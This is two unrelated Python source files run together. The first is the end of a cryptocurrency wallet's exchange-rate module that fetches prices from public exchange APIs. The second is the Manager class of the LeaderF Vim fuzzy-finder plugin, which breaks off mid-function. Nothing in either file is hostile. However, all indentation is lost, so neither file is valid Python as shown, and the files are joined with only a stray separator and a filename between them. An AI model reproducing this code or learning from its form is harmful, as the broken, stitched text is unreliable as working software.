json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
class Zaif(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.zaif.jp', '/api/1/last_price/btc_jpy')
return {'JPY': Decimal(json['last_price'])}
# fetch cmm/usd exchange rate
class CryptoBridge(ExchangeBase):
def get_rates(self, ccy):
cmm_btc = 0
pair_with_btc_json = self.get_json('api.crypto-bridge.org', '/api/v1/ticker')
for ticker in pair_with_btc_json:
if ticker['id'] == 'CMM_BTC':
cmm_btc = Decimal(ticker['last'])
break
btc_to_fiat_json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BTC')
result = dict([(ccy, Decimal(rate) * cmm_btc)
for (ccy, rate) in btc_to_fiat_json["data"]["rates"].items()])
return result
def history_ccys(self):
return ['USD']
def request_history(self, ccy):  # the base class's get_historical_rates_safe() calls request_history()
json = self.get_json('coincodex.com', '/api/coincodex/get_coin_history/CMM/2019-04-01/2019-05-01/600')
history = json['CMM'][0]
return dict([(datetime.utcfromtimestamp(h[0]).strftime('%Y-%m-%d'), h[1])
for h in history])
class Crex24(ExchangeBase):
def get_rates(self, ccy):
pair_with_btc_json = self.get_json('api.crex24.com',
'/CryptoExchangeService/BotPublic/ReturnTicker?request=[NamePairs=BTC_CMM]')
cmm_btc = Decimal(pair_with_btc_json['Tickers'][0]['Last'])
btc_to_fiat_json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BTC')
result = dict([(ccy, Decimal(rate) * cmm_btc)
for (ccy, rate) in btc_to_fiat_json["data"]["rates"].items()])
return result
def history_ccys(self):
return ['USD']
def request_history(self, ccy):  # the base class's get_historical_rates_safe() calls request_history()
json = self.get_json('coincodex.com', '/api/coincodex/get_coin_history/CMM/2019-04-01/2019-05-01/600')
history = json['CMM'][0]
return dict([(datetime.utcfromtimestamp(h[0]).strftime('%Y-%m-%d'), h[1])
for h in history])
class Coinodex(ExchangeBase):
def history_ccys(self):
return ['USD']
def request_history(self, ccy):  # the base class's get_historical_rates_safe() calls request_history()
json = self.get_json('coincodex.com', '/api/coincodex/get_coin_history/CMM/2019-04-01/2019-05-01/600')
history = json['CMM'][0]
return dict([(datetime.utcfromtimestamp(h[0]).strftime('%Y-%m-%d'), h[1])
for h in history])
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
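# dictinvert turns an exchange -> currencies mapping into currency -> exchanges,
# e.g. (illustrative):
#
#   >>> dictinvert({'BitStamp': ['USD'], 'Kraken': ['USD', 'EUR']})
#   {'USD': ['BitStamp', 'Kraken'], 'EUR': ['Kraken']}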
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
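# Illustrative: with self.ccy == 'USD' (precision 2) and commas=True the format
# string is "{:,.2f}", so ccy_amount_str(Decimal('1234.567'), True) returns
# '1,234.57'; with self.ccy == 'JPY' (precision 0) it returns '1,235'.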
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout == 0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import os
import sys
import json
import time
import operator
import itertools
import threading
import multiprocessing
from functools import partial
from functools import wraps
from .instance import LfInstance
from .cli import LfCli
from .utils import *
from .fuzzyMatch import FuzzyMatch
from .asyncExecutor import AsyncExecutor
from .devicons import (
webDevIconsGetFileTypeSymbol,
removeDevIcons
)
is_fuzzyEngine_C = False
try:
import fuzzyEngine
is_fuzzyEngine_C = True
cpu_count = multiprocessing.cpu_count()
lfCmd("let g:Lf_fuzzyEngine_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyEngine_C = 0")
is_fuzzyMatch_C = False
try:
import fuzzyMatchC
is_fuzzyMatch_C = True
lfCmd("let g:Lf_fuzzyMatch_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyMatch_C = 0")
if sys.version_info >= (3, 0):
def isAscii(str):
try:
str.encode("ascii")
return True
except UnicodeEncodeError:
return False
else:
def isAscii(str):
try:
str.decode("ascii")
return True
except UnicodeDecodeError:
return False
def modifiableController(func):
@wraps(func)
def deco(self, *args, **kwargs):
self._getInstance().buffer.options['modifiable'] = True
func(self, *args, **kwargs)
self._getInstance().buffer.options['modifiable'] = False
return deco
def catchException(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except vim.error as e: # for neovim
if str(e) != "b'Keyboard interrupt'" and str(e) != 'Keyboard interrupt':
raise e
elif self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
except KeyboardInterrupt: # <C-C>, this does not work in vim
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
return deco
def ignoreEvent(events):
def wrapper(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = events
func(self, *args, **kwargs)
finally:
vim.options['eventignore'] = saved_eventignore
return deco
return wrapper
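# The three decorators above wrap Manager methods: modifiableController makes the
# LeaderF buffer temporarily modifiable, catchException swallows the Keyboard
# interrupt errors raised when <C-C> is pressed, and ignoreEvent suppresses the
# given autocommand events while the method runs, e.g.
#
#   @ignoreEvent('BufWinEnter,BufEnter')
#   def _createPopupModePreview(self, title, source, line_nr, jump_cmd):
#       ...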
#*****************************************************
# Manager
#*****************************************************
class Manager(object):
def __init__(self):
self._autochdir = 0
self._instance = None
self._cli = LfCli()
self._explorer = None
self._content = []
self._index = 0
self._help_length = 0
self._show_help = False
self._selections = {}
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
self._highlight_ids = []
self._orig_line = ''
self._ctrlp_pressed = False
self._fuzzy_engine = None
self._result_content = []
self._reader_thread = None
self._timer_id = None
self._highlight_method = lambda : None
self._orig_cwd = None
self._cursorline_dict = {}
self._empty_query = lfEval("get(g:, 'Lf_EmptyQuery', 1)") == '1'
self._preview_winid = 0
self._is_previewed = False
self._match_ids = []
self._vim_file_autoloaded = False
self._arguments = {}
self._getExplClass()
#**************************************************************
# abstract methods; in fact, all of these functions can be overridden
#**************************************************************
def _getExplClass(self):
"""
this function MUST be overridden
return the name of Explorer class
"""
raise NotImplementedError("Can't instantiate abstract class Manager "
"with abstract methods _getExplClass")
def _defineMaps(self):
pass
def _defineCommonMaps(self):
normal_map = lfEval("get(g:, 'Lf_NormalMap', {})")
if "_" not in normal_map:
return
for [lhs, rhs] in normal_map["_"]:
# If a buffer-local mapping does not exist, map it
maparg = lfEval("maparg('{}', 'n', 0, 1)".format(lhs))
if maparg == {} or maparg.get("buffer", "0") == "0" :
lfCmd("nnoremap <buffer> <silent> {} {}".format(lhs, rhs))
def _cmdExtension(self, cmd):
"""
this function can be overridden to add a new cmd;
if it returns True, the input loop exits
"""
pass
@removeDevIcons
def _argaddFiles(self, files):
# It will raise E480 without 'silent!'
lfCmd("silent! argdelete *")
for file in files:
lfCmd("argadd %s" % escSpecial(file))
def _issue_422_set_option(self):
if lfEval("has('nvim')") == '1' and self._is_previewed:
lfCmd("silent! setlocal number<")
lfCmd("silent! setlocal relativenumber<")
lfCmd("silent! setlocal cursorline<")
lfCmd("silent! setlocal colorcolumn<")
lfCmd("silent! setlocal winhighlight<")
def _acceptSelection(self, *args, **kwargs):
pass
def _getDigest(self, line, mode):
"""
this function can be overridden
specify which part of the line is to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if mode == 0:
return line
elif mode == 1:
return getBasename(line)
else:
return getDirname(line)
def _getDigestStartPos(self, line, mode):
"""
this function can be overridden
return the start position of the digest returned by _getDigest()
Args:
mode: 0, return the start position of the full path
1, return the start position of the name only
2, return the start position of the directory name
"""
if mode == 0 or mode == 2:
return 0
else:
return lfBytesLen(getDirname(line))
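# Illustrative example (assuming getBasename/getDirname behave like
# os.path.basename/dirname): for line = '/path/to/foo.txt',
#   _getDigest(line, 0) -> '/path/to/foo.txt'   (full path)
#   _getDigest(line, 1) -> 'foo.txt'            (name only)
#   _getDigest(line, 2) -> the directory part
# and _getDigestStartPos(line, 1) returns the byte length of the directory part,
# i.e. the column where the highlighted file name starts.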
def _createHelp(self):
return []
def _setStlMode(self, **kwargs):
if self._cli.isFuzzy:
if self._getExplorer().supportsNameOnly():
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
else:
mode = 'Fuzzy'
else:
mode = 'Regex'
modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"}
for opt in kwargs.get("arguments", {}):
if opt in modes:
if opt == "--regexMode":
mode = 'Regex'
elif self._getExplorer().supportsNameOnly():
if opt == "--nameOnly":
mode = 'NameOnly'
elif opt == "--fullPath":
mode = 'FullPath'
else: # "--fuzzy"
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
elif opt in ("--nameOnly", "--fullPath", "--fuzzy"):
mode = 'Fuzzy'
break
self._getInstance().setStlMode(mode)
self._cli.setCurrentMode(mode)
def _beforeEnter(self):
self._resetAutochdir()
self._cur_buffer = vim.current.buffer
def _afterEnter(self):
if self._vim_file_autoloaded == False:
category = self._getExplorer().getStlCategory()
if category == 'Colorscheme':
category = 'Colors'
lfCmd("silent! call leaderf#%s#a_nonexistent_function()" % category)
self._vim_file_autoloaded = True
if "--nowrap" in self._arguments:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal nowrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:false)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = False
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal wrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:true)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = True
if self._getInstance().getWinPos() != 'popup':
self._defineMaps()
self._defineCommonMaps()
id = int(lfEval("matchadd('Lf_hl_cursorline', '.*\%#.*', 9)"))
self._match_ids.append(id)
else:
lfCmd("""call win_execute({}, 'let matchid = matchadd(''Lf_hl_cursorline'', ''.*\%#.*'', 9)')"""
.format(self._getInstance().getPopupWinId()))
id = int(lfEval("matchid"))
self._match_ids.append(id)
if is_fuzzyEngine_C:
self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False)
def _beforeExit(self):
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
self.clearSelections()
self._getExplorer().cleanup()
if self._fuzzy_engine:
fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine)
self._fuzzy_engine = None
if self._reader_thread and self._reader_thread.is_alive():
self._stop_reader_thread = True
self._closePreviewPopup()
if self._getInstance().getWinPos() == 'popup':
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._match_ids = []
def _afterExit(self):
pass
def _bangEnter(self):
self._preview_open = False
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
self._cli.hideCursor()
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._resetHighlights()
if self._cli.pattern and self._index == 0:
self._search(self._content)
if len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
def _bangReadFinished(self):
if self._preview_open == False and self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._previewResult(False)
self._preview_open = True
def _getList(self, pairs):
"""
this function can be overridden
return a list constructed from pairs
Args:
pairs: a list of tuple(weight, line, ...)
"""
return [p[1] for p in pairs]
def _getUnit(self):
"""
indicates how many lines are considered as a unit
"""
return 1
def _supportsRefine(self):
return False
def _previewInPopup(self, *args, **kwargs):
pass
def _closePreviewPopup(self):
if lfEval("has('nvim')") == '1':
if self._preview_winid:
if int(lfEval("nvim_win_is_valid(%d) == v:true" % self._preview_winid)):
lfCmd("noautocmd call nvim_win_close(%d, 1)" % self._preview_winid)
self._preview_winid = 0
else:
if self._preview_winid:
lfCmd("noautocmd call popup_close(%d)" % self._preview_winid)
self._preview_winid = 0
def _previewResult(self, preview):
if self._getInstance().getWinPos() == 'floatwin':
self._cli.buildPopupPrompt()
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
if self._orig_line != self._getInstance().currentLine:
self._closePreviewPopup()
else:
return
if not self._needPreview(preview):
return
line = self._getInstance().currentLine
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
line_nr = self._getInstance().window.cursor[0]
self._previewInPopup(line, self._getInstance().buffer, line_nr)
return
orig_pos = self._getInstance().getOriginalPos()
cur_pos = (vim.current.tabpage, vim.current.window, vim.current.buffer)
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = 'BufLeave,WinEnter,BufEnter'
try:
vim.current.tabpage, vim.current.window = orig_pos[:2]
line_nr = self._getInstance().window.cursor[0]
self._acceptSelection(line, self._getInstance().buffer, line_nr, preview=True)
lfCmd("augroup Lf_Cursorline")
lfCmd("autocmd! BufwinEnter <buffer> setlocal cursorline<")
lfCmd("augroup END")
finally:
if self._getInstance().getWinPos() != 'popup':
vim.current.tabpage, vim.current.window, vim.current.buffer = cur_pos
vim.options['eventignore'] = saved_eventignore
def _restoreOrigCwd(self):
if self._orig_cwd is None:
return
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
try:
if int(lfEval("&autochdir")) == 0 and lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
except:
if lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
def _needExit(self, line, arguments):
return True
def setArguments(self, arguments):
self._arguments = arguments
def getArguments(self):
return self._arguments
#**************************************************************
@ignoreEvent('BufWinEnter,BufEnter')
def _createPopupModePreview(self, title, source, line_nr, jump_cmd):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2
else:
maxwidth = min(width, int(lfEval("&columns")))
relative = 'editor'
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
float_window = self._getInstance().window
float_win_row = int(float(lfEval("nvim_win_get_config(%d).row" % float_window.id)))
float_win_col = int(float(lfEval("nvim_win_get_config(%d).col" % float_window.id)))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
anchor = "NW"
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
row = float_win_row + float_window.height + statusline_height
col = float_win_col
height = int(lfEval("&lines")) - row - 2
if height < 1:
return
width = float_window.width
elif preview_pos.lower() == 'top':
anchor = "SW"
row = float_win_row - 1
col = float_win_col
height = row
if height < 1:
return
width = float_window.width
else:
anchor = "SW"
start = int(lfEval("line('w0')")) - 1
end = int(lfEval("line('.')")) - 1
col_width = float_window.width - int(lfEval("&numberwidth")) - 1
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
row = float_win_row + delta_height
col = float_win_col + int(lfEval("&numberwidth")) + 1 + float_window.cursor[1]
height = row
width = maxwidth
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
lfCmd("let g:Lf_PreviewWindowID[%d] = %d" % (id(self), self._preview_winid))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'winhighlight', 'Normal:Lf_hl_popup_window')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("norm! zz")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
# lfCmd("redraw!") # maybe we don't need it, it makes the preview slow
else:
popup_window = self._getInstance().window
popup_pos = lfEval("popup_getpos(%d)" % popup_window.id)
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
line = int(popup_pos["line"]) + int(popup_pos["height"]) + statusline_height
pos = "topleft"
maxheight = int(lfEval("&lines")) - line
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
elif preview_pos.lower() == 'top':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
# int(popup_pos["line"]) - 1(exclude the first line) - 1(input window) - 1(title)
maxheight = int(popup_pos["line"]) - 3
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 2
pos = "botleft"
line = maxheight + 1
else: # cursor
lfCmd("""call win_execute(%d, "let numberwidth = &numberwidth")""" % popup_window.id)
col = int(popup_pos["core_col"]) + int(lfEval("numberwidth")) + popup_window.cursor[1]
lfCmd("""call win_execute(%d, "let delta_height = line('.') - line('w0')")""" % popup_window.id)
# the line of buffer starts from 0, while the line of line() starts from 1
start = int(lfEval("line('w0', %d)" % popup_window.id)) - 1
end = int(lfEval("line('.', %d)" % popup_window.id)) - 1
col_width = int(popup_pos["core_width"]) - int(lfEval("numberwidth"))
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window)
maxheight = int(popup_pos["core_line"]) + delta_height - 2
pos = "botleft"
line = maxheight + 1
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": pos,
"line": line,
"col": col,
"border": [1, 0, 0, 1],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if preview_pos.lower() == 'bottom':
del options["title"]
options["border"] = [0, 0, 1, 0]
elif preview_pos.lower() == 'cursor' and maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "call cursor(%d, 1)")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber colorcolumn= ')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal wincolor=Lf_hl_popup_window')" % self._preview_winid)
if lfEval("get(g:, 'Lf_PopupShowFoldcolumn', 1)") == '0':
lfCmd("call win_execute(%d, 'setlocal foldcolumn=0')" % self._preview_winid)
else:
lfCmd("call win_execute(%d, 'setlocal foldcolumn=1')" % self._preview_winid)
lfCmd("call win_execute(%d, 'norm! zz')" % self._preview_winid)
@ignoreEvent('BufRead,BufReadPre,BufReadPost')
def _createPopupPreview(self, title, source, line_nr, jump_cmd=''):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
line_nr = int(line_nr)
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._createPopupModePreview(title, source, line_nr, jump_cmd)
return
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
width = int(lfEval("&columns"))//2
else:
width = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 3"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
relative = 'editor'
anchor = "SW"
row = maxheight
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
height = min(maxheight, buffer_len)
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = (int(lfEval("&columns")) - width) // 2
elif preview_pos.lower() == 'left':
col = 0
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns")) - width
else:
relative = 'cursor'
row = 0
col = 0
if maxheight < int(lfEval("&lines"))//2 - 2:
anchor = "NW"
if relative == 'cursor':
row = 1
else:
row = maxheight + 1
height = min(int(lfEval("&lines")) - maxheight - 3, buffer_len)
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
